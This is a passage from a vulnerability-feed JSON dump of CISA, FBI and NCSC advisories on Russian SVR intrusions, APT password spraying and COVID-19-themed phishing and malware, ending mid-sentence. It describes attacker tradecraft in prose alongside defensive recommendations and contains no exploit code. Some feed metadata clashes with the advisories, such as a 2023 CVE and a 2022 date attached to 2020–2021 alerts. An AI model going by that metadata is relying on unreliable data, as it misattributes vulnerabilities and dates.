That misconfiguration enabled logins using legacy single-factor authentication on devices which did not support multi-factor authentication. The FBI suspects this was achieved by spoofing user agent strings to appear to be older versions of mail clients, including Apple\u2019s mail client and old versions of Microsoft Outlook. After logging in as a non-administrative user, the actors used the permission changes applied by the compromised administrative user to access specific mailboxes of interest within the victim organization.\n\nWhile the password sprays were conducted from many different IP addresses, once the actors obtained access to an account, that compromised account was generally only accessed from a single IP address corresponding to a leased virtual private server (VPS). The FBI observed minimal overlap between the VPSs used for different compromised accounts, and each leased server used to conduct follow-on actions was in the same country as the victim organization.\n\nDuring the period of their access, the actors consistently logged into the administrative account to modify account permissions, including removing their access to accounts presumed to no longer be of interest, or adding permissions to additional accounts. 
\n\n#### _**Recommendations**_\n\nTo defend from this technique, the FBI and DHS recommend that network operators follow best practices for configuring access to cloud computing environments, including:\n\n * Mandatory use of an approved multi-factor authentication solution for all users from both on-premises and remote locations.\n * Prohibit remote access to administrative functions and resources from IP addresses and systems not owned by the organization.\n * Regular audits of mailbox settings, account permissions, and mail forwarding rules for evidence of unauthorized changes.\n * Where possible, enforce the use of strong passwords and prevent the use of easily guessed or commonly used passwords through technical means, especially for administrative accounts.\n * Regularly review the organization\u2019s password management program.\n * Ensure the organization\u2019s information technology (IT) support team has well-documented standard operating procedures for password resets and user account lockouts.\n * Maintain a regular cadence of security awareness training for all company employees.\n\n### Leveraging Zero-Day Vulnerability\n\nIn a separate incident, SVR actors used CVE-2019-19781, a zero-day vulnerability at the time, against a virtual private network (VPN) appliance to obtain network access. Following exploitation of the device in a way that exposed user credentials, the actors identified and authenticated to systems on the network using the exposed credentials.\n\nThe actors worked to establish a foothold on several different systems that were not configured to require multi-factor authentication and attempted to access web-based resources in specific areas of the network in line with information of interest to a foreign intelligence service.\n\nFollowing initial discovery, the victim attempted to evict the actors. However, the victim had not identified the initial point of access, and the actors used the same VPN appliance vulnerability to regain access. 
Eventually, the initial access point was identified, removed from the network, and the actors were evicted. As in the previous case, the actors used dedicated VPSs located in the same country as the victim, probably to make it appear that the network traffic was not anomalous with normal activity.\n\n#### **_Recommendations_**\n\nTo defend from this technique, the FBI and DHS recommend network defenders ensure endpoint monitoring solutions are configured to identify evidence of lateral movement within the network and:\n\n * Monitor the network for evidence of encoded PowerShell commands and execution of network scanning tools, such as NMAP.\n * Ensure host based anti-virus/endpoint monitoring solutions are enabled and set to alert if monitoring or reporting is disabled, or if communication is lost with a host agent for more than a reasonable amount of time.\n * Require use of multi-factor authentication to access internal systems.\n * Immediately configure newly-added systems to the network, including those used for testing or development work, to follow the organization\u2019s security baseline and incorporate into enterprise monitoring tools.\n\n### WELLMESS Malware\n\nIn 2020, the governments of the United Kingdom, Canada, and the United States attributed intrusions perpetrated using malware known as WELLMESS to APT 29. WELLMESS was written in the Go programming language, and the previously-identified activity appeared to focus on targeting COVID-19 vaccine development. The FBI\u2019s investigation revealed that following initial compromise of a network\u2014normally through an unpatched, publicly-known vulnerability\u2014the actors deployed WELLMESS. Once on the network, the actors targeted each organization\u2019s vaccine research repository and Active Directory servers. 
These intrusions, which mostly relied on targeting on-premises network resources, were a departure from historic tradecraft, and likely indicate new ways the actors are evolving in the virtual environment. More information about the specifics of the malware used in this intrusion has been previously released and is referenced in the \u2018Resources\u2019 section of this document.\n\n### Tradecraft Similarities of SolarWinds-enabled Intrusions\n\nDuring the spring and summer of 2020, using modified SolarWinds network monitoring software as an initial intrusion vector, SVR cyber operators began to expand their access to numerous networks. The SVR\u2019s modification and use of trusted SolarWinds products as an intrusion vector is also a notable departure from the SVR\u2019s historic tradecraft.\n\nThe FBI\u2019s initial findings indicate similar post-infection tradecraft with other SVR-sponsored intrusions, including how the actors purchased and managed infrastructure used in the intrusions. After obtaining access to victim networks, SVR cyber actors moved through the networks to obtain access to e-mail accounts. Targeted accounts at multiple victim organizations included accounts associated with IT staff. The FBI suspects the actors monitored IT staff to collect useful information about the victim networks, determine if victims had detected the intrusions, and evade eviction actions.\n\n#### **_Recommendations_**\n\nAlthough defending a network from a compromise of trusted software is difficult, some organizations successfully detected and prevented follow-on exploitation activity from the initial malicious SolarWinds software. 
This was achieved using a variety of monitoring techniques, including:\n\n * Auditing log files to identify attempts to access privileged certificates and creation of fake identity providers.\n * Deploying software to identify suspicious behavior on systems, including the execution of encoded PowerShell.\n * Deploying endpoint protection systems with the ability to monitor for behavioral indicators of compromise.\n * Using available public resources to identify credential abuse within cloud environments.\n * Configuring authentication mechanisms to confirm certain user activities on systems, including registering new devices.\n\nWhile few victim organizations were able to identify the initial access vector as SolarWinds software, some were able to correlate different alerts to identify unauthorized activity. The FBI and DHS believe those indicators, coupled with stronger network segmentation (particularly \u201czero trust\u201d architectures or limited trust between identity providers) and log correlation, can enable network defenders to identify suspicious activity requiring additional investigation.\n\n### General Tradecraft Observations\n\nSVR cyber operators are capable adversaries. In addition to the techniques described above, FBI investigations have revealed infrastructure used in the intrusions is frequently obtained using false identities and cryptocurrencies. VPS infrastructure is often procured from a network of VPS resellers. These false identities are usually supported by low-reputation infrastructure including temporary e-mail accounts and temporary voice over internet protocol (VoIP) telephone numbers. 
While not exclusively used by SVR cyber actors, a number of SVR cyber personas use e-mail services hosted on cock[.]li or related domains.\n\nThe FBI also notes SVR cyber operators have used open-source or commercially available tools continuously, including Mimikatz\u2014an open-source credential-dumping tool\u2014and Cobalt Strike\u2014a commercially available post-exploitation and command-and-control framework.\n\n### Mitigations\n\nThe FBI and DHS recommend service providers strengthen their user validation and verification systems to prohibit misuse of their services.\n\n### Resources\n\n * NSA, CISA, FBI [Joint Cybersecurity Advisory: Russian SVR Targets U.S. and Allied Networks](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>)\n * CISA: [Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise](<https://us-cert.cisa.gov/remediating-apt-compromised-networks>)\n * CISA [Alert AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>)\n * FBI, CISA, ODNI, NSA Joint Statement: [Joint Statement by the Federal Bureau of Investigation, the Cybersecurity and Infrastructure Security Agency, the Office of the Director of National Intelligence (ODNI), and the National Security Agency](<https://www.odni.gov/index.php/newsroom/press-releases/press-releases-2021/item/2176-joint-statement-by-the-federal-bureau-of-investigation-fbi-the-cybersecurity-and-infrastructure-security-agency-cisa-the-office-of-the-director-of-national-intelligence-odni-and-the-national-security-agency-nsa>)\n * CISA Alert [AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>)\n * [CISA Insights: What Every Leader Needs to Know about the Ongoing APT Cyber Activity](<https://www.cisa.gov/sites/default/files/publications/CISA Insights - What Every Leader 
Needs to Know About the Ongoing APT Cyber Activity - FINAL_508.pdf>)\n * FBI, CISA [Joint Cybersecurity Advisory: Advanced Persistent Threat Actors Targeting U.S. Think Tanks](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-336A-APT_Actors_Targeting_US_ThinkTanks.pdf>)\n * CISA: [Malicious Activity Targeting COVID-19 Research, Vaccine Development ](<https://us-cert.cisa.gov/ncas/current-activity/2020/07/16/malicious-activity-targeting-covid-19-research-vaccine-development>)\n * NCSC, CSE, NSA, CISA Advisory: [APT 29 targets COVID-19 vaccine development](<https://media.defense.gov/2020/Jul/16/2002457639/-1/-1/0/NCSC_APT29_ADVISORY-QUAD-OFFICIAL-20200709-1810.PDF>)\n\n### Revisions\n\nApril 26, 2021: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-26T12:00:00", "type": "ics", "title": "Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2023-27350"], "modified": "2021-04-26T12:00:00", "id": "AA21-116A", "href": 
"https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-116a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-02T15:12:32", "description": "### Summary\n\n**This is a joint alert from the United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom\u2019s National Cyber Security Centre (NCSC).**\n\nCISA and NCSC continue to see indications that advanced persistent threat (APT) groups are exploiting the Coronavirus Disease 2019 (COVID-19) pandemic as part of their cyber operations. This joint alert highlights ongoing activity by APT groups against organizations involved in both national and international COVID-19 responses. It describes some of the methods these actors are using to target organizations and provides mitigation advice.\n\nThe joint CISA-NCSC [Alert: (AA20-099A) COVID-19 Exploited by Malicious Cyber Actors](<https://www.us-cert.gov/ncas/alerts/aa20-099a>) from April 8, 2020, previously detailed the exploitation of the COVID-19 pandemic by cybercriminals and APT groups. This joint CISA-NCSC Alert provides an update to ongoing malicious cyber activity relating to COVID-19. For a graphical summary of CISA\u2019s joint COVID-19 Alerts with NCSC, see the following [guide](<https://cisa.gov/sites/default/files/publications/Joint_CISA_UK_Tip-COVID-19_Cyber_Threat_Exploitation_S508C.pdf>).\n\n### COVID-19-related targeting\n\nAPT actors are actively targeting organizations involved in both national and international COVID-19 responses. 
These organizations include healthcare bodies, pharmaceutical companies, academia, medical research organizations, and local governments.\n\nAPT actors frequently target organizations in order to collect bulk personal information, intellectual property, and intelligence that aligns with national priorities.\n\nThe pandemic has likely raised additional interest for APT actors to gather information related to COVID-19. For example, actors may seek to obtain intelligence on national and international healthcare policy, or acquire sensitive data on COVID-19-related research.\n\n### Targeting of pharmaceutical and research organizations\n\nCISA and NCSC are currently investigating a number of incidents in which threat actors are targeting pharmaceutical companies, medical research organizations, and universities. APT groups frequently target such organizations in order to steal sensitive research data and intellectual property for commercial and state benefit. Organizations involved in COVID-19-related research are attractive targets for APT actors looking to obtain information for their domestic research efforts into COVID-19-related medicine.\n\nThese organizations\u2019 global reach and international supply chains increase exposure to malicious cyber actors. Actors view supply chains as a weak link that they can exploit to obtain access to better-protected targets. Many supply chain elements have also been affected by the shift to remote working and the new vulnerabilities that have resulted.\n\nRecently CISA and NCSC have seen APT actors scanning the external websites of targeted companies and looking for vulnerabilities in unpatched software. 
Actors are known to take advantage of Citrix vulnerability CVE-2019-19781[[1]](<https://www.us-cert.gov/ncas/alerts/aa20-031a>),[[2]](<https://www.ncsc.gov.uk/news/citrix-alert>) and vulnerabilities in virtual private network (VPN) products from Pulse Secure, Fortinet, and Palo Alto.[[3]](<https://www.us-cert.gov/ncas/alerts/aa20-010a>),[[4]](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n### COVID-19-related password spraying activity\n\nCISA and NCSC are actively investigating large-scale password spraying campaigns conducted by APT groups. These actors are using this type of attack to target healthcare entities in a number of countries\u2014including the United Kingdom and the United States\u2014as well as international healthcare organizations.\n\nPreviously, APT groups have used password spraying to target a range of organizations and companies across sectors\u2014including government, emergency services, law enforcement, academia and research organizations, financial institutions, and telecommunications and retail companies.\n\n### Technical Details\n\n[Password spraying](<https://www.ncsc.gov.uk/blog-post/spray-you-spray-me-defending-against-password-spraying-attacks>) is a commonly used style of brute force attack in which the attacker tries a single and commonly used password against many accounts before moving on to try a second password, and so on. This technique allows the attacker to remain undetected by avoiding rapid or frequent account lockouts. These attacks are successful because, for any given large set of users, there will likely be some with common passwords.\n\nMalicious cyber actors, including APT groups, collate names from various online sources that provide organizational details and use this information to identify possible accounts for targeted institutions. 
The actors will then \u201cspray\u201d the identified accounts with lists of commonly used passwords.\n\nOnce the malicious cyber actor compromises a single account, they will use it to access other accounts where the credentials are reused. Additionally, the actor could attempt to move laterally across the network to steal additional data and implement further attacks against other accounts within the network.\n\nIn previous incidents investigated by CISA and NCSC, malicious cyber actors used password spraying to compromise email accounts in an organization and then, in turn, used these accounts to download the victim organization\u2019s Global Address List (GAL). The actors then used the GAL to password spray further accounts.\n\nNCSC has previously provided [examples of frequently found passwords](<https://www.ncsc.gov.uk/blog-post/passwords-passwords-everywhere>), which attackers are known to use in password spray attacks to attempt to gain access to corporate accounts and networks. In these attacks, malicious cyber actors often use passwords based on the month of the year, seasons, and the name of the company or organization.\n\nCISA and NCSC continue to investigate activity linked to large-scale password spraying campaigns. APT actors will continue to exploit COVID-19 as they seek to answer additional intelligence questions relating to the pandemic. CISA and NCSC advise organizations to follow the mitigation advice below in view of this heightened activity.\n\n### Mitigations\n\nCISA and NCSC have previously published information for organizations on password spraying and improving password policy. 
Putting this into practice will significantly reduce the chance of compromise from this kind of attack.\n\n * [CISA alert on password spraying attacks](<https://www.us-cert.gov/ncas/alerts/TA18-086A>)\n * [CISA guidance on choosing and protecting passwords](<https://www.us-cert.gov/ncas/tips/ST04-002>)\n * [CISA guidance on supplementing passwords](<https://www.us-cert.gov/ncas/tips/ST05-012>)\n * [NCSC guidance on password spraying attacks](<https://www.ncsc.gov.uk/blog-post/spray-you-spray-me-defending-against-password-spraying-attacks>)\n * [NCSC guidance on password administration for system owners](<https://www.ncsc.gov.uk/collection/passwords>)\n * [NCSC guidance on password deny lists](<https://www.ncsc.gov.uk/blog-post/passwords-passwords-everywhere>)\n\nCISA\u2019s [Cyber Essentials](<https://www.cisa.gov/sites/default/files/publications/19_1106_cisa_CISA_Cyber_Essentials_S508C_0.pdf>) for small organizations provides guiding principles for leaders to develop a culture of security and specific actions for IT professionals to put that culture into action. Additionally, the UK government\u2019s [Cyber Aware](<https://www.ncsc.gov.uk/cyberaware/home>) campaign provides useful advice for individuals on how to stay secure online during the coronavirus pandemic. This includes advice on protecting passwords, accounts, and devices.\n\nA number of other mitigations will be of use in defending against the campaigns detailed in this report:\n\n * **Update VPNs, network infrastructure devices, and devices being used to remote into work environments with the latest software patches and configurations.** See CISA\u2019s [guidance on enterprise VPN security](<https://www.us-cert.gov/ncas/alerts/aa20-073a>) and NCSC [guidance on virtual private networks](<https://www.ncsc.gov.uk/collection/mobile-device-guidance/virtual-private-networks>) for more information.\n * **Use multi-factor authentication to reduce the impact of password compromises.** See the U.S. 
National Cybersecurity Awareness Month\u2019s [how-to guide for multi-factor authentication](<https://niccs.us-cert.gov/sites/default/files/documents/pdf/ncsam_howtoguidemfa_508.pdf?trackDocs=ncsam_howtoguidemfa_508.pdf>). Also see NCSC guidance on [multi-factor authentication services](<https://www.ncsc.gov.uk/guidance/multi-factor-authentication-online-services>) and [setting up two-factor authentication](<https://www.ncsc.gov.uk/guidance/setting-two-factor-authentication-2fa>).\n * **Protect the management interfaces of your critical operational systems.** In particular, use a browse-down architecture to prevent attackers from easily gaining privileged access to your most vital assets. See [the NCSC blog on protecting management interfaces](<https://www.ncsc.gov.uk/blog-post/protect-your-management-interfaces>).\n * **Set up a security monitoring capability** so you are collecting the data that will be needed to analyze network intrusions. See the [NCSC introduction to logging for security purposes](<https://www.ncsc.gov.uk/guidance/introduction-logging-security-purposes>).\n * **Review and refresh your incident management processes.** See [the NCSC guidance on incident management](<https://www.ncsc.gov.uk/guidance/10-steps-incident-management>).\n * **Use modern systems and software.** These have better security built in. If you cannot move off out-of-date platforms and applications straight away, there are short-term steps you can take to improve your position. See [the NCSC guidance on obsolete platform security](<https://www.ncsc.gov.uk/guidance/obsolete-platforms-security>).\n * **Further information:** Invest in preventing malware-based attacks across various scenarios. See CISA\u2019s guidance on [ransomware](<https://www.us-cert.gov/Ransomware>) and [protecting against malicious code](<https://www.us-cert.gov/ncas/tips/ST18-271>). 
Also see [the NCSC guidance on mitigating malware and ransomware attacks](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>).\n\n### Contact Information\n\nCISA encourages U.S. users and organizations to contribute any additional information that may relate to this threat by emailing [CISAServiceDesk@cisa.dhs.gov](<mailto:CISAServiceDesk@cisa.dhs.gov>).\n\nThe NCSC encourages UK organizations to report any suspicious activity to the NCSC via their website: <https://report.ncsc.gov.uk/>.\n\n## Disclaimers\n\n_This report draws on information derived from CISA, NCSC, and industry sources. Any findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times._\n\n_CISA does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by CISA._\n\n### References\n\n[[1] CISA Alert: Detecting Citrix CVE-2019-19781](<https://www.us-cert.gov/ncas/alerts/aa20-031a>)\n\n[[2] NCSC Alert: Actors exploiting Citrix products vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[3] CISA Alert: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.us-cert.gov/ncas/alerts/aa20-010a>)\n\n[[4] NCSC Alert: Vulnerabilities exploited in VPN products used worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n### Revisions\n\nMay 5, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": 
"NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-25T12:00:00", "type": "ics", "title": "APT Groups Target Healthcare and Essential Services", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2023-27350"], "modified": "2022-01-25T12:00:00", "id": "AA20-126A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-126a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-02T15:12:51", "description": "### Summary\n\n**This is a joint alert from the United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom\u2019s National Cyber Security Centre (NCSC).**\n\nThis alert provides information on exploitation by cybercriminal and advanced persistent threat (APT) groups of the current coronavirus disease 2019 (COVID-19) global pandemic. It includes a non-exhaustive list of indicators of compromise (IOCs) for detection as well as mitigation advice.\n\nBoth CISA and NCSC are seeing a growing use of COVID-19-related themes by malicious cyber actors. 
At the same time, the surge in teleworking has increased the use of potentially vulnerable services, such as virtual private networks (VPNs), amplifying the threat to individuals and organizations.\n\nAPT groups and cybercriminals are targeting individuals, small and medium enterprises, and large organizations with COVID-19-related scams and phishing emails. This alert provides an overview of COVID-19-related malicious cyber activity and offers practical advice that individuals and organizations can follow to reduce the risk of being impacted. The IOCs provided within the accompanying .csv and .stix files of this alert are based on analysis from CISA, NCSC, and industry.\n\n**Note:** This is a fast-moving situation and this alert does not seek to catalogue all COVID-19-related malicious cyber activity. Individuals and organizations should remain alert to increased activity relating to COVID-19 and take proactive steps to protect themselves.\n\n### Technical Details\n\n## Summary of Attacks\n\nAPT groups are using the COVID-19 pandemic as part of their cyber operations. These cyber threat actors will often masquerade as trusted entities. Their activity includes using coronavirus-themed phishing messages or malicious applications, often masquerading as trusted entities that may have been previously compromised. Their goals and targets are consistent with long-standing priorities such as espionage and \u201chack-and-leak\u201d operations.\n\nCybercriminals are using the pandemic for commercial gain, deploying a variety of ransomware and other malware.\n\nBoth APT groups and cybercriminals are likely to continue to exploit the COVID-19 pandemic over the coming weeks and months. 
Threats observed include:\n\n * Phishing, using the subject of coronavirus or COVID-19 as a lure,\n * Malware distribution, using coronavirus- or COVID-19-themed lures,\n * Registration of new domain names containing wording related to coronavirus or COVID-19, and\n * Attacks against newly\u2014and often rapidly\u2014deployed remote access and teleworking infrastructure.\n\nMalicious cyber actors rely on basic social engineering methods to entice a user to carry out a specific action. These actors are taking advantage of human traits such as curiosity and concern around the coronavirus pandemic in order to persuade potential victims to:\n\n * Click on a link or download an app that may lead to a phishing website, or the downloading of malware, including ransomware.\n   * For example, a malicious Android app purports to provide a real-time coronavirus outbreak tracker but instead attempts to trick the user into providing administrative access to install \"CovidLock\" ransomware on their device.[[1]](<https://www.techrepublic.com/article/covidlock-ransomware-exploits-coronavirus-with-malicious-android-app/>)\n * Open a file (such as an email attachment) that contains malware.\n   * For example, email subject lines contain COVID-19-related phrases such as \u201cCoronavirus Update\u201d or \u201c2019-nCov: Coronavirus outbreak in your city (Emergency)\u201d.\n\nTo create the impression of authenticity, malicious cyber actors may spoof sender information in an email to make it appear to come from a trustworthy source, such as the World Health Organization (WHO) or an individual with \u201cDr.\u201d in their title. In several examples, actors send phishing emails that contain links to a fake email login page. 
Other emails purport to be from an organization\u2019s human resources (HR) department and advise the employee to open the attachment.\n\nMalicious file attachments containing malware payloads may be named with coronavirus- or COVID-19-related themes, such as \u201cPresident discusses budget savings due to coronavirus with Cabinet.rtf.\u201d\n\n**Note:** A non-exhaustive list of IOCs related to this activity is provided within the accompanying .csv and .stix files of this alert.\n\n## Phishing\n\nCISA and NCSC have both observed a large volume of phishing campaigns that use the social engineering techniques described above.\n\nExamples of phishing email subject lines include:\n\n * 2020 Coronavirus Updates,\n * Coronavirus Updates,\n * 2019-nCov: New confirmed cases in your City, and\n * 2019-nCov: Coronavirus outbreak in your city (Emergency).\n\nThese emails contain a call to action, encouraging the victim to visit a website that malicious cyber actors use for stealing valuable data, such as usernames and passwords, credit card information, and other personal information.\n\n## SMS Phishing\n\nMost phishing attempts come by email, but NCSC has observed some attempts to carry out phishing by other means, including text messages (SMS).\n\nHistorically, SMS phishing has often used financial incentives\u2014including government payments and rebates (such as a tax rebate)\u2014as part of the lure. Coronavirus-related phishing continues this financial theme, particularly in light of the economic impact of the epidemic and governments\u2019 employment and financial support packages. For example, a series of SMS messages uses a UK government-themed lure to harvest email, address, name, and banking information. 
These SMS messages\u2014purporting to be from \u201cCOVID\u201d and \u201cUKGOV\u201d (see figure 1)\u2014include a link directly to the phishing site (see figure 2).\n\n\n\n##### Figure 1: UK government-themed SMS phishing\n\n\n\n##### Figure 2: UK government-themed phishing page\n\nAs this example demonstrates, malicious messages can arrive by methods other than email. In addition to SMS, possible channels include WhatsApp and other messaging services. Malicious cyber actors are likely to continue using financial themes in their phishing campaigns. Specifically, it is likely that they will use new government aid packages responding to COVID-19 as themes in phishing campaigns.\n\n## Phishing for credential theft\n\nA number of actors have used COVID-19-related phishing to steal user credentials. These emails include previously mentioned COVID-19 social engineering techniques, sometimes complemented with urgent language to enhance the lure.\n\nIf the user clicks on the hyperlink, a spoofed login webpage appears that includes a password entry form. These spoofed login pages may relate to a wide array of online services including\u2014but not limited to\u2014email services provided by Google or Microsoft, or services accessed via government websites.\n\nTo further entice the recipient, the websites will often contain COVID-19-related wording within the URL (e.g., \u201ccorona-virus-business-update,\u201d \u201ccovid19-advisory,\u201d or \u201ccov19esupport\u201d). These spoofed pages are designed to look legitimate or accurately impersonate well-known websites. Often the only way to notice malicious intent is through examining the website URL. In some circumstances, malicious cyber actors specifically customize these spoofed login webpages for the intended victim.\n\nIf the victim enters their password on the spoofed page, the attackers will be able to access the victim\u2019s online accounts, such as their email inbox. 
This access can then be used to acquire personal or sensitive information, or to further disseminate phishing emails, using the victim\u2019s address book.\n\n## Phishing for malware deployment\n\nA number of threat actors have used COVID-19-related lures to deploy malware. In most cases, actors craft an email that persuades the victim to open an attachment or download a malicious file from a linked website. When the victim opens the attachment, the malware is executed, compromising the victim\u2019s device.\n\nFor example, NCSC has observed various email messages that deploy the \u201cAgent Tesla\u201d keylogger malware. The email appears to be sent from Dr. Tedros Adhanom Ghebreyesus, Director-General of WHO. This email campaign began on Thursday, March 19, 2020. Another similar campaign offers thermometers and face masks to fight the epidemic. The email purports to attach images of these medical products but instead contains a loader for Agent Tesla.\n\nIn other campaigns, emails include a Microsoft Excel attachment (e.g., \u201c8651 8-14-18.xls\u201d) or contain URLs linking to a landing page that contains a button that\u2014if clicked\u2014redirects to download an Excel spreadsheet, such as \u201cEMR Letter.xls\u201d. In both cases, the Excel file contains macros that, if enabled, execute an embedded dynamic-link library (DLL) to install the \u201cGet2 loader\u201d malware. Get2 loader has been observed loading the \u201cGraceWire\u201d Trojan.\n\nThe \u201cTrickBot\u201d malware has been used in a variety of COVID-19-related campaigns. In one example, emails target Italian users with a document purporting to be information related to COVID-19 (see figure 3). 
The document contains a malicious macro that downloads a batch file (BAT), which launches JavaScript, which\u2014in turn\u2014pulls down the TrickBot binary, executing it on the system.\n\n##### Figure 3: Email containing malicious macro targeting Italian users[[2]](<https://www.bleepingcomputer.com/news/security/trickbot-malware-targets-italy-in-fake-who-coronavirus-emails/>)\n\nIn many cases, Trojans\u2014such as TrickBot or GraceWire\u2014will download further malicious files, such as Remote Access Trojans (RATs), desktop-sharing clients, and ransomware. In order to maximize the likelihood of payment, cybercriminals will often deploy ransomware at a time when organizations are under increased pressure. Hospitals and health organizations in the United States,[[3]](<https://securityboulevard.com/2020/03/maze-ransomware-continues-to-hit-healthcare-units-amid-coronavirus-covid-19-outbreak/>) Spain,[[4]](<https://www.computing.co.uk/news/4012969/hospitals-coronavirus-ransomware>) and across Europe[[5]](<https://www.bleepingcomputer.com/news/security/covid-19-testing-center-hit-by-cyberattack/>) have all been recently affected by ransomware incidents.\n\nAs always, individuals and organizations should be on the lookout for new and evolving lures. Both CISA[[6]](<https://www.us-cert.gov/ncas/tips/ST18-271>),[[7]](<https://www.us-cert.gov/Ransomware>) and NCSC[[8]](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>) provide guidance on mitigating malware and ransomware attacks.\n\n## Exploitation of new teleworking infrastructure\n\nMany organizations have rapidly deployed new networks, including VPNs and related IT infrastructure, to shift their entire workforce to teleworking.\n\nMalicious cyber actors are taking advantage of this mass move to telework by exploiting a variety of publicly known vulnerabilities in VPNs and other remote working tools and software. 
In several examples, CISA and NCSC have observed actors scanning for publicly known vulnerabilities in Citrix products. The Citrix vulnerability CVE-2019-19781 and its exploitation have been widely reported since early January 2020. Both CISA[[9]](<https://www.us-cert.gov/ncas/alerts/aa20-031a>) and NCSC[[10]](<https://www.ncsc.gov.uk/news/citrix-alert>) provide guidance on CVE-2019-19781 and continue to investigate multiple instances of this vulnerability's exploitation.\n\nSimilarly, known vulnerabilities affecting VPN products from Pulse Secure, Fortinet, and Palo Alto continue to be exploited. CISA provides guidance on the Pulse Secure vulnerability[[11]](<https://www.us-cert.gov/ncas/alerts/aa20-010a>) and NCSC provides guidance on the vulnerabilities in Pulse Secure, Fortinet, and Palo Alto.[[12]](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\nMalicious cyber actors are also seeking to exploit the increased use of popular communications platforms\u2014such as Zoom or Microsoft Teams\u2014by sending phishing emails that include malicious files with names such as \u201czoom-us-zoom_##########.exe\u201d and \u201cmicrosoft-teams_V#mu#D_##########.exe\u201d (# representing various digits that have been reported online).[[13]](<https://blog.checkpoint.com/2020/03/30/covid-19-impact-cyber-criminals-target-zoom-domains/>) CISA and NCSC have also observed phishing websites for popular communications platforms. In addition, attackers have been able to hijack teleconferences and online classrooms that have been set up without security controls (e.g., passwords) or with unpatched versions of the communications platform software.[[14]](<https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic>)\n\nThe surge in teleworking has also led to an increase in the use of Microsoft\u2019s Remote Desktop Protocol (RDP). 
